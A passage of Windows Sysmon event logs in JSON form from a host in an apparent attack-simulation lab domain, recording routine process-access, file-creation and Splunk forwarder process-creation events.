ivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.897\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2291-5F25-0000-0010308C0F00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.897","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2291-5F25-0000-0010308C0F00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.897\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2291-5F25-0000-0010308C0F00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.897","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2291-5F25-0000-0010308C0F00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:41.897\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2291-5F25-0000-0010308C0F00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:41.897","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2291-5F25-0000-0010308C0F00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:42.053\r\nProcessGuid: {41C8662E-2291-5F25-0000-0010308C0F00}\r\nProcessId: 5036\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.Reflection.Context.dll\r\nCreationUtcTime: 2020-08-01 08:06:42.053","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:42.053","ProcessGuid":"{41C8662E-2291-5F25-0000-0010308C0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.Reflection.Context.dll","CreationUtcTime":"2020-08-01 08:06:42.053","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.085\r\nProcessGuid: {41C8662E-2292-5F25-0000-00108E8F0F00}\r\nProcessId: 2176\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.085","ProcessGuid":"{41C8662E-2292-5F25-0000-00108E8F0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00108E8F0F00}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00108E8F0F00}","TargetProcessId":"2176","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00108E8F0F00}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00108E8F0F00}","TargetProcessId":"2176","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: 